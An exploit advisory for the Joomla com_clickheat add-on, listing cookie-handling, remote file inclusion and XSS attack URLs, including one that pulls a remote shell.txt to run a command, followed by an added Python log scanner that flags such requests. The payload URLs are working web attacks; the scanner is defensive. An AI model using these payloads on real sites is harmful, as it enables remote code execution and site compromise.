**********************Joomla Component com_clickheat Multiple vulnerabilities***********************

By: e.wiZz!
Site: madspot.org
Info: bosnian ftw!

In the wild.....

**************************************************************************************************************************************

******Info:

Clickheat is an add-on for Joomla whose primary goal is to "visualize" clicks made on the pages of your website. Upon collecting enough information, Clickheat displays a heatmap of the most clicked areas, coloring them from blue (rare clicks) to yellow ("hottest area").

*****Site: recly.com

*****Demo: http://www.recly.com/demo/joomla2/index.php?from_mod=true&tmpl=component&option=com_clickheat

*******************************COOKIE HANDLING VULNERABILITY************(from .jpg)**************************************

http:////index.php?option=com_clickheat&task=http://sitewithevil.JPG

http://www.recly.com/demo/joomla2/index.php?from_mod=true&tmpl=component&option=com_clickheat&task=open_heatmap&page=http://www.planetnana.co.il/mycoolpictures123/fake/lt2.jpg

******************************************************RFI*********************************************************************************

if magic_quotes_off

http:////index.php?option=com_clickheat&task=http://shell.txt?cmd=ls -la

************XSS**************

http:////index.php?option=com_clickheat&task=http://somewhere.js
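
Added example (not part of the original advisory, and not code from its author or from the Clickheat project): a log check for the request pattern shown in the advisory above, i.e. com_clickheat requests whose task or page parameter carries a remote URL. The function names, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the advisory shows carrying a remote URL.
WATCHED_PARAMS = ("task", "page")
# Absolute ("scheme://") or protocol-relative ("//") URL at the start of a value.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Request target inside a combined-log-format line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(request_target):
    """Return [(param, value)] when a com_clickheat request passes a remote
    URL in task or page; return [] for anything else."""
    # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
    pairs = parse_qsl(urlsplit(request_target).query, keep_blank_values=True)
    if not any(k == "option" and v.lower() == "com_clickheat" for k, v in pairs):
        return []
    return [(k, v) for k, v in pairs
            if k in WATCHED_PARAMS and REMOTE_VALUE.match(v)]


def scan(log_lines):
    """Return [(line_number, findings)] for every matching log line."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        findings = suspicious_params(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits


# Constructed sample lines: documentation IPs and example.* hosts only.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?option=com_clickheat&task=open_heatmap&page=home HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php?option=com_clickheat&task=open_heatmap&page=http://files.example.net/a.jpg HTTP/1.1" 200 740',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /index.php?option=com_clickheat&task=http%3A%2F%2Ffiles.example.net%2Fb.txt HTTP/1.1" 200 91',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?option=com_content&task=view&id=3 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {findings}")
```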